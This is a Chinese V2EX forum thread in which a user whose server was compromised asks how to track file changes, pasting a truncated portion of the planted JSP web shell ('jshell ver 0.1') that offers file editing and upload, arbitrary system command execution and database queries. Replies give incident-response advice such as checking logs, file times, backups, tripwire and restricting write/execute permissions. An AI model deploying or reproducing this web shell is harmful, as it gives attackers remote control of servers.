服务器被挂马怎么查询文件变动

2016-01-25 10:12:24 +08:00
 keeley

<body>
} else {
String password = null;
if (session.getAttribute("password") == null) {
password = (String)request.getParameter("password");
if (validate(password) == false) {
out.println("<div align=\"center\"><font color=\"red\"><li>密码错误!</font></div>");
out.close();
return;
}
session.setAttribute("password", password);
} else {
password = (String)session.getAttribute("password");
}
String action = null;
if (request.getParameter("action") == null)
action = "main";
else
action = (String)request.getParameter("action");

if (action.equals("exit")) {
    session.removeAttribute("password");
    response.sendRedirect(request.getRequestURI());
    out.close();
    return;
}

%>
<table align="center" width="600" border="0" cellpadding="2" cellspacing="0">
<form name="form1" method="get">
<tr bgcolor="#CCCCCC">
<td id="title"><!--[程序首页]--></td>
<td align="right">
<select name="action" onChange="javascript:changeAction(document.form1)">
<option value="main">程序首页</option>
<option value="filesystem">文件系统</option>
<option value="command">系统命令</option>
<option value="database">数据库</option>
<option value="config">程序配置</option>
<option value="about">关于程序</option>
<option value="exit">退出程序</option>
</select>
<script language="JavaScript">
<%
out.println("var action = \"" + action + "\"");
%>
var sAction = document.form1.action;
for (var i = 0; i < sAction.length; i ++) {
if (sAction[i].value == action) {
sAction[i].selected = true;
//title.innerHTML = "[" + sAction[i].innerHTML + "]";
}
}
</script>
</td>
</tr>
</form>
</table>
<%
//=====================================================================================
// end of main menu

if (action.equals("main")) {

// print the system info table
//=======================================================================================
%>
<table align="center" width="600" cellpadding="2" cellspacing="1" border="0" bgcolor="#CCCCCC">
<tr bgcolor="#FFFFFF">
<td colspan="2" align="center">服务器信息</td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="300" align="center" class="datarows">服务器名</td>
<td align="center" class="datarows"><%=request.getServerName()%></td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="300" align="center" class="datarows">服务器端口</td>
<td align="center" class="datarows"><%=request.getServerPort()%></td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="300" align="center" class="datarows">操作系统</td>
<td align="center" class="datarows"><%=System.getProperty("os.name") + " " + System.getProperty("os.version") + " " + System.getProperty("os.arch")%></td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="300" align="center" class="datarows">当前用户名</td>
<td align="center" class="datarows"><%=System.getProperty("user.name")%></td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="300" align="center" class="datarows">当前用户目录</td>
<td align="center" class="datarows"><%=System.getProperty("user.home")%></td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="300" align="center" class="datarows">当前用户工作目录</td>
<td align="center" class="datarows"><%=System.getProperty("user.dir")%></td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="300" align="center" class="datarows">程序相对路径</td>
<td align="center" class="datarows"><%=request.getRequestURI()%></td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="300" align="center" class="datarows">程序绝对路径</td>
<td align="center" class="datarows"><%=request.getRealPath(request.getServletPath())%></td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="300" align="center" class="datarows">网络协议</td>
<td align="center" class="datarows"><%=request.getProtocol()%></td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="300" align="center" class="datarows">服务器软件版本信息</td>
<td align="center" class="datarows"><%=application.getServerInfo()%></td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="300" align="center" class="datarows">JDK 版本</td>
<td align="center" class="datarows"><%=System.getProperty("java.version")%></td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="300" align="center" class="datarows">JDK 安装路径</td>
<td align="center" class="datarows"><%=System.getProperty("java.home")%></td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="300" align="center" class="datarows">JAVA 虚拟机版本</td>
<td align="center" class="datarows"><%=System.getProperty("java.vm.specification.version")%></td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="300" align="center" class="datarows">JAVA 虚拟机名</td>
<td align="center" class="datarows"><%=System.getProperty("java.vm.name")%></td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="300" align="center" class="datarows">JAVA 类路径</td>
<td align="center" class="datarows"><%=System.getProperty("java.class.path")%></td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="300" align="center" class="datarows">JAVA 载入库搜索路径</td>
<td align="center" class="datarows"><%=System.getProperty("java.library.path")%></td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="300" align="center" class="datarows">JAVA 临时目录</td>
<td align="center" class="datarows"><%=System.getProperty("java.io.tmpdir")%></td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="300" align="center" class="datarows">JIT 编译器名</td>
<td align="center" class="datarows"><%=System.getProperty("java.compiler") == null ? "" : System.getProperty("java.compiler")%></td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="300" align="center" class="datarows">扩展目录路径</td>
<td align="center" class="datarows"><%=System.getProperty("java.ext.dirs")%></td>
</tr>
<tr bgcolor="#FFFFFF">
<td colspan="2" align="center">客户端信息</td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="300" align="center" class="datarows">客户机地址</td>
<td align="center" class="datarows"><%=request.getRemoteAddr()%></td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="300" align="center" class="datarows">服务机器名</td>
<td align="center" class="datarows"><%=request.getRemoteHost()%></td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="300" align="center" class="datarows">用户名</td>
<td align="center" class="datarows"><%=request.getRemoteUser() == null ? "" : request.getRemoteUser()%></td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="300" align="center" class="datarows">请求方式</td>
<td align="center" class="datarows"><%=request.getScheme()%></td>
</tr>
<tr bgcolor="#FFFFFF">
<td width="300" align="center" class="datarows">应用安全套接字层</td>
<td align="center" class="datarows"><%=request.isSecure() == true ? "是" : "否"%></td>
</tr>
</table>
<%
//=======================================================================================
// end of printing the system info table
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
} else if (action.equals("filesystem")) {
String curPath = "";
String result = "";
String fsAction = "";

if (request.getParameter("curPath") == null) {
        curPath = request.getRealPath(request.getServletPath());
        curPath = pathConvert((new File(curPath)).getParent());
    } else {
        curPath = Unicode2GB((String)request.getParameter("curPath"));
    }

    if (request.getParameter("fsAction") == null) {
        fsAction = "list";
    } else {
        fsAction = (String)request.getParameter("fsAction");
    }

    if (fsAction.equals("list"))
        result = listFiles(curPath, request.getRequestURI() + "?action=" + action);
    else if (fsAction.equals("browse")) {
        result = listFiles(new File(curPath).getParent(), request.getRequestURI() + "?action=" + action);
        result += browseFile(curPath);
    }
    else if (fsAction.equals("open"))
        result = openFile(curPath, request.getRequestURI() + "?action=" + action);
    else if (fsAction.equals("save")) {
        if (request.getParameter("fileContent") == null) {
            result = "<font color=\"red\">页面导航错误</font>";
        } else {
            String fileContent = Unicode2GB((String)request.getParameter("fileContent"));
            result = saveFile(curPath, request.getRequestURI() + "?action=" + action, fileContent);
        }
    } else if (fsAction.equals("createFolder")) {
        if (request.getParameter("folderName") == null) {
            result = "<font color=\"red\">目录名不能为空</font>";
        } else {
            String folderName = Unicode2GB(request.getParameter("folderName").trim());
            if (folderName.equals("")) {
                result = "<font color=\"red\">目录名不能为空</font>"; 
            } else {
                result = createFolder(curPath, request.getRequestURI() + "?action=" + action, folderName);
            }
        }
    } else if (fsAction.equals("createFile")) {
        if (request.getParameter("fileName") == null) {
            result = "<font color=\"red\">文件名不能为空</font>";
        } else {
            String fileName = Unicode2GB(request.getParameter("fileName").trim());
            if (fileName.equals("")) {
                result = "<font color=\"red\">文件名不能为空</font>";
            } else {
                result = createFile(curPath, request.getRequestURI() + "?action=" + action, fileName);
            }
        }
    } else if (fsAction.equals("deleteFile")) {
        if (request.getParameter("filesDelete") == null) {
            result = "<font color=\"red\">没有选择要删除的文件</font>";
        } else {
            String[] files2Delete = (String[])request.getParameterValues("filesDelete");
            if (files2Delete.length == 0) {
                result = "<font color=\"red\">没有选择要删除的文件</font>";
            } else {
                for (int n = 0; n < files2Delete.length; n ++) {
                    files2Delete[n] = Unicode2GB(files2Delete[n]);
                }
                result = deleteFile(curPath, request.getRequestURI() + "?action=" + action, files2Delete);
            }
        }
    } else if (fsAction.equals("saveAs")) {
        if (request.getParameter("fileContent") == null) {
            result = "<font color=\"red\">页面导航错误</font>";
        } else {
            String fileContent = Unicode2GB(request.getParameter("fileContent"));
            result = saveAs(curPath, request.getRequestURI() + "?action=" + action, fileContent);
        }
    } else if (fsAction.equals("upload")) {
        result = uploadFile(request, curPath, request.getRequestURI() + "?action=" + action);
    } else if (fsAction.equals("copyto")) {
        if (request.getParameter("filesDelete") == null || request.getParameter("dstPath") == null) {
            result = "<font color=\"red\">没有选择要复制的文件</font>";
        } else {
            String[] files2Copy = request.getParameterValues("filesDelete");
            String dstPath = request.getParameter("dstPath").trim();
            if (files2Copy.length == 0) {
                result = "<font color=\"red\">没有选择要复制的文件</font>";
            } else if (dstPath.equals("")) {
                result = "<font color=\"red\">没有填写要复制到的目录路径</font>";
            } else {
                for (int i = 0; i < files2Copy.length; i ++)
                    files2Copy[i] = Unicode2GB(files2Copy[i]);

                result = copyFiles(curPath, request.getRequestURI() + "?action=" + action, files2Copy, Unicode2GB(dstPath));
            }
        }
    } else if (fsAction.equals("rename")) {
        if (request.getParameter("fileRename") == null) {
            result = "<font color=\"red\">页面导航错误</font>";
        } else {
            String file2Rename = request.getParameter("fileRename").trim();
            String newName = request.getParameter("newName").trim();
            if (file2Rename.equals("")) {
                result = "<font color=\"red\">没有选择要重命名的文件</font>";
            } else if (newName.equals("")) {
                result = "<font color=\"red\">没有填写新文件名</font>";
            } else {
                result = renameFile(curPath, request.getRequestURI() + "?action=" + action, Unicode2GB(file2Rename), Unicode2GB(newName));
            }           
        }
    }

%>
<table align="center" width="600" border="0" cellpadding="2" cellspacing="1" bgcolor="#CCCCCC">
<form method="post" name="form2" action="<%= request.getRequestURI() + "?action=" + action%>">
<tr bgcolor="#FFFFFF">
<td align="center">地址 <input type="text" size="80" name="curPath" class="textbox" value="<%=curPath%>" />
<input type="submit" value="转到" class="button" /></td>
</tr>
</form>
<tr bgcolor="#FFFFFF">
<td><%= result.trim().equals("")?" " : result%></td>
</tr>
</table>
<%

/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
} else if (action.equals("command")) {
String cmd = "";
InputStream ins = null;
String result = "";

if (request.getParameter("command") != null) {      
        cmd = (String)request.getParameter("command");
        result = exeCmd(cmd);
    }

// print the command form
//========================================================================================
%>
<table border="0" width="600" cellpadding="2" cellspacing="1" bgcolor="#CCCCCC" align="center">
<form name="form2" method="post" action="<%=request.getRequestURI() + "?action=" + action%>">
<tr bgcolor="#FFFFFF">
<td align="center">执行命令</td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="center">
<input type="text" class="textbox" size="80" name="command" value="<%=cmd%>" />
<input type="submit" class="button" value="执行" />
</td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="center">执行结果</td>
</tr>
</form>
</table>
<table align="center" width="600" border="0">
<tr>
<td><%=result == "" ? " " : result%></td>
</tr>
</table>
<%
//=========================================================================================
// end of printing command form
///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
} else if (action.equals("database")) {
String dbAction = "";
String result = "";
String dbType = "";
String dbServer = "";
String dbPort = "";
String dbUsername = "";
String dbPassword = "";
String dbName = "";
String dbResult = "";
String sql = "";

if (request.getParameter("dbAction") == null) {
        dbAction = "main";
    } else {
        dbAction = request.getParameter("dbAction").trim();
        if (dbAction.equals(""))
            dbAction = "main";
    }

    if (dbAction.equals("main")) {
        result = "&nbsp;";
    } else if (dbAction.equals("dbConnect")) {
        if (request.getParameter("dbType") == null ||
            request.getParameter("dbServer") == null ||
            request.getParameter("dbPort") == null ||
            request.getParameter("dbUsername") == null ||
            request.getParameter("dbPassword") == null ||
            request.getParameter("dbName") == null) {
            response.sendRedirect(request.getRequestURI() + "?action=" + action);
        } else {
            dbType = request.getParameter("dbType").trim();
            dbServer = request.getParameter("dbServer").trim();
            dbPort = request.getParameter("dbPort").trim();
            dbUsername = request.getParameter("dbUsername").trim();
            dbPassword = request.getParameter("dbPassword").trim();
            dbName = request.getParameter("dbName").trim();

            if (DBInit(dbType, dbServer, dbPort, dbUsername, dbPassword, dbName)) {
                if (DBConnect(dbUsername, dbPassword)) {
                    if (request.getParameter("sql") != null) {
                        sql = request.getParameter("sql").trim();
                        if (! sql.equals("")) {
                            dbResult = DBExecute(sql);
                        }
                    }

                    result =  "<script language=\"javascript\">\n";
                    result += "<!--\n";
                    result += "function exeSql() {\n";
                    result += "    if (ltrim(document.dbInfo.sql.value) != \"\")\n";
                    result += "        document.dbInfo.submit();";
                    result += "}\n";
                    result += "\n";
                    result += "function resetIt() {\n";
                    result += "    document.dbInfo.sql.value = \"\";";
                    result += "}\n";
                    result += "//-->\n";
                    result += "</script>\n";
                    result += "sql 语句<br/><textarea name=\"sql\" cols=\"70\" rows=\"6\">" + sql + "</textarea><br/><input type=\"submit\" class=\"button\" onclick=\"javascript:exeSql()\" value=\"执行\"/>&nbsp;<input type=\"reset\" class=\"button\" onclick=\"javascript:resetIt()\" value=\"清空\"/>\n";

                    DBRelease();
                } else {
                    result = "<font color=\"red\">数据库连接失败</font>";
                }
            } else {
                result = "<font color=\"red\">数据库连接驱动没有找到</font>";
            }               
        }
    }

%>
<table align="center" width="600" border="0" cellpadding="2" cellspacing="1" bgcolor="#CCCCCC">
<form name="config" method="post" action="<%=request.getRequestURI() + "?action=config&cfAction=save"%>" onSubmit="javascript:selectAllTypes()">
<tr bgcolor="#FFFFFF">
<td align="center" width="200">密码</td>
<td><input type="text" size="30" name="password" class="textbox" value="<%=_password%>" /></td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="center">系统编码</td>
<td><input type="text" size="30" name="encode" value="<%=_encodeType%>" class="textbox" /></td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="center">Session 超时时间</td>
<td><input type="text" size="5" name="sessionTime" class="textbox" value="<%=_sessionOutTime%>" /></td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="center">可编辑文件类型</td>
<td>
<table border="0" width="190" cellpadding="0" cellspacing="0">
<tr>
<td>
<input type="text" size="11" class="textbox" name="newType" />
</td>
<td align="center">
<input type="button" onClick="javascript:delFileType()" value="<<" class="button" />
<p></p>
<input type="button" value=">>" onClick="javascript:addFileType()" class="button" />
</td>
<td align="right">

<select name="textFileTypes" size="4" style="width: 87px" multiple="true">

<%
for (i = 0; i < _textFileTypes.length; i ++) {
%>
<option value="<%=_textFileTypes[i]%>"><%=_textFileTypes[i]%></option>
<%
}
%>
</select>
</td>
</tr>
</table>
</td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="center" colspan="2"><input type="submit" value="保存" class="button" /></td>
</tr>
</form>
</table>
<%
} else if (cfAction.equals("save")) {
if (request.getParameter("password") == null ||
request.getParameter("encode") == null ||
request.getParameter("sessionTime") == null ||
request.getParameterValues("textFileTypes") == null) {
response.sendRedirect(request.getRequestURI());
}

String result = "";

        String newPassword = request.getParameter("password").trim();
        String newEncodeType = request.getParameter("encode").trim();
        String newSessionTime = request.getParameter("sessionTime").trim();
        String[] newTextFileTypes = request.getParameterValues("textFileTypes");
        String jshellPath = request.getRealPath(request.getServletPath());

        try {
            JshellConfig jconfig = new JshellConfig(jshellPath);
            jconfig.setPassword(newPassword);
            jconfig.setEncodeType(newEncodeType);
            jconfig.setSessionTime(newSessionTime);
            jconfig.setTextFileTypes(newTextFileTypes);
            jconfig.save();
            result += "设置保存成功,正在返回,请稍候……";
            result += "<meta http-equiv=\"refresh\" content=\"2;url=" + request.getRequestURI() + "?action=" + request.getParameter("action") + "\">";
        } catch (JshellConfigException e) {
            result = "<font color=\"red\">" + e.getMessage() + "</font>"; 
        }

%>
<table border="0" align="center" width="600" cellpadding="2" cellspacing="1" bgcolor="#CCCCCC">
<tr bgcolor="#FFFFFF">
<td align="center">关于 jshell ver 0.1</td>
</tr>
<tr bgcolor="#FFFFFF">
<td> Jshell 是一个简单的 jsp 的 Web Shell ,功能很简单。这个程序是我这几天上课空闲时间里没是干写着玩的,慢慢的也有了点雏形,就拿出来希望对你有点用处。程序本身很乱,可读性不好,不过还是欢迎有兴趣的朋友和我交流。</td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="right">created by <a href="mailto:luoluonet@hotmail.com">luoluo</a> and welcome to <a href="http://www.ph4nt0m.org" target="_blank">幻影旅团</a></td>
</tr>
</table>
</body>
</html>

4599 次点击
所在节点    Linux
18 条回复
maskerTUI
2016-01-25 10:20:47 +08:00
不是想着怎么补救吗?看一下程序哪里有漏洞,赶紧补程序,装个安全狗什么的挡一下。
master13
2016-01-25 11:10:03 +08:00
<body>
} else {

……
po 主这样的页面……后面干脆就不看了……
odirus
2016-01-25 11:14:22 +08:00
版本控制的重要性。。。以前我们服务器也被挂马了,不过处理这种病毒很烦,所以通过负载均衡把流量导入其他服务器,直接重装系统,加固安全,重新部署。。。

如果你有自动部署环境和代码的话,会非常快。
xsseroot
2016-01-25 11:17:30 +08:00
看系统日志与 web server 日志
xsseroot
2016-01-25 11:18:12 +08:00
还有文件修改时间
maskerTUI
2016-01-25 11:22:18 +08:00
@xsseroot 文件修改时间也是可以通过马来改的
h4rdy
2016-01-25 11:59:46 +08:00
要是被留下各种猥琐后门,还真不好找出来。重装吧
dapang1221
2016-01-25 12:08:03 +08:00
你们不备份么。。?直接回滚不就好了。。顶多丢些缓存。。要么就是看修改时间,要么就是找出来插入的代码,批量替换掉
chuhades
2016-01-25 13:42:11 +08:00
有备份就回滚吧,没有的话建议如下:
1. 日志
2. 文件修改时间
3. 网上搜索下相关脚本,对 web 目录进行查杀
4. 判断是否被提权,如被提权注意用户, crontab 任务
reb00ts
2016-01-25 17:40:29 +08:00
楼主你这都已经被挂马了,我觉得还是先将问题主机下线,查日志,找到漏洞从哪里产生,黑客干了什么,把这些摸清楚以便于及时堵住漏洞和清理后门,然后给服务器做点基本的安全加固(尤其是 web 服务低权限运行),至于你说的查询文件变动,我推荐 tripwire ,很不错的工具
f7ee9404
2016-01-25 18:18:59 +08:00
更新的时候有没有每个文件做个校验和? 没有的话 回退吧
just1
2016-01-25 18:22:00 +08:00
linux 还是重装吧
FifiLyu
2016-01-25 20:52:11 +08:00
楼主一定要确保 web 服务器是低权限运行,只允许访问指定的文件扩展名。即使有网页木马也没任何关系,直接删除即可。
我自己维护的服务器很多都出现这种情况,客户的网页漏洞多得不得了,天天中木马,我都到了不想删除的地步。虚拟主机服务器上网页木马一堆堆,删都删除不完。

我自己的服务器也有网页中木马的情况,我分析开发人员完全解决不可能。所以服务器有系统防火墙, web 服务器有 web 防火墙, php 内部代码有简单的过滤代码。这个方案上线了 2 个月,解决了之前 1 年都没解决的被挂马的情况。
FifiLyu
2016-01-25 20:53:38 +08:00
现在楼主已经中木马,分析文件创建时间是最实际的方法。看系统日志之类的没任何作用。
kiah
2016-01-25 21:04:28 +08:00
云锁 你值得拥有
realpg
2016-01-26 01:09:03 +08:00
为什么有写权限的目录里面同时有执行权限呢?
vus520
2016-01-26 15:38:50 +08:00
1 ,版本控制工具看修改历史
2 ,可写目录决对不能有执行权限,可写目录的所有请求都当成文件下载,不执行

如果是服务器沦陷了,那就要堵服务器的漏洞了。
keeley
2016-01-26 16:17:28 +08:00
@master13 主题字数限制 裁剪了很多挂马的代码。

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/253123

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX